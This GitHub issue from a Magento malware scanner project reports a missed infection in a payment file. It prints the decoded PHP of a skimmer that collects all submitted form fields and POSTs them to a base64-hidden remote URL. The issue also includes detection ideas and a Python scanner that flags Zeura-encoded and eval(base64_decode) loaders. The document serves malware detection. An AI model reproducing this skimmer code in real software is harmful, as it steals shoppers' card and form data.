gwillem / magento-malware-scanner

Scanner, signatures and the largest collection of Magento malware
GNU General Public License v3.0
680 stars, 153 forks

Malware not detected in Cc.php and Mage_Payment_Model_Method_Cc.php #229

Open ernesthernandez opened 6 years ago

ernesthernandez commented 6 years ago

I found this line manually after a deep mwscan:

```php
<?php /* PHP Encode v1.0 by zeura.com */ $XnNhAWEnhoiqwciqpoHH=file(__FILE__); eval(base64_decode("ENCRYPT...
```

When I decrypt Zeura I get the following code at the end of the file:

```php
if(isset($_POST)){
    // Flatten every submitted form field into a query string
    $EvxCq = WmJQW('',$_POST,0);
    // Reuse an existing tracking cookie or set a new one per visitor
    $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);
    // POST the collected data, hostname and cookie id to a base64-hidden URL
    file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));
}
// Recursively serialises a (nested) array into key=value pairs joined by '&'
function WmJQW($bRrNN,$CYRnG,$qabbF) {
    foreach($CYRnG as $vikBC => $PmGhs) {
        if(!is_array($PmGhs)) {
            if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}
            else {$dwTSf[] = $vikBC.'='.$PmGhs;}
        } else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}
    }
    return implode('&',$dwTSf);
}
?>
```

gwillem commented 6 years ago

Thanks for submitting. I'm not sure how we should proceed here, unless we would flag all "zeura" encrypted files. Perhaps, we should flag the existence of "zeura" in specific Magento files. Then, we would have to rewrite the scanner to pass the filename as attribute to the scan function. See also https://github.com/VirusTotal/yara/issues/202
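The path-aware check suggested above, as an added example that is not part of the scanner's own code: the Zeura marker is treated as malicious only in Magento core files, and merely noted elsewhere, while the `eval(base64_decode(` loader is flagged regardless of location. The file paths and sample contents are constructed for illustration (the `includes/src/` path assumes Magento compiler output).

```python
import re
from pathlib import PurePosixPath

# Encoder banner and loader pattern as quoted in the issue.
ZEURA_MARKER = re.compile(r"PHP Encode v1\.0 by zeura\.com", re.I)
EVAL_B64_LOADER = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)

# Core files that should never ship encoded. Paths are assumptions derived
# from the file names in the issue title, not a list maintained by the project.
SENSITIVE_FILES = {
    "app/code/core/Mage/Payment/Model/Method/Cc.php",
    "includes/src/Mage_Payment_Model_Method_Cc.php",  # compiler-mode copy
}
CORE_PREFIX = "app/code/core/"


def scan_file(path, content):
    """Return finding names for one file, using both path and content.

    A content-only signature cannot tell a legitimately encoded extension
    from a core file that has been replaced, so the path decides severity.
    """
    findings = []
    normalized = str(PurePosixPath(path))
    is_core = normalized in SENSITIVE_FILES or normalized.startswith(CORE_PREFIX)
    if ZEURA_MARKER.search(content):
        findings.append("zeura_in_core_file" if is_core else "zeura_encoded_file")
    if EVAL_B64_LOADER.search(content):
        findings.append("eval_base64_loader")
    return findings


# Constructed samples: an encoded loader, and an unmodified core class stub.
SAMPLE_INFECTED = ('<?php /* PHP Encode v1.0 by zeura.com */ '
                   '$x=file(__FILE__); eval(base64_decode("ENCRYPT...")); ?>')
SAMPLE_CLEAN = ('<?php class Mage_Payment_Model_Method_Cc '
                'extends Mage_Payment_Model_Method_Abstract {}')

if __name__ == "__main__":
    for p, c in [("app/code/core/Mage/Payment/Model/Method/Cc.php", SAMPLE_INFECTED),
                 ("app/code/local/Vendor/Module/Model/Cc.php", SAMPLE_INFECTED),
                 ("app/code/core/Mage/Payment/Model/Method/Cc.php", SAMPLE_CLEAN)]:
        print(p, scan_file(p, c))
```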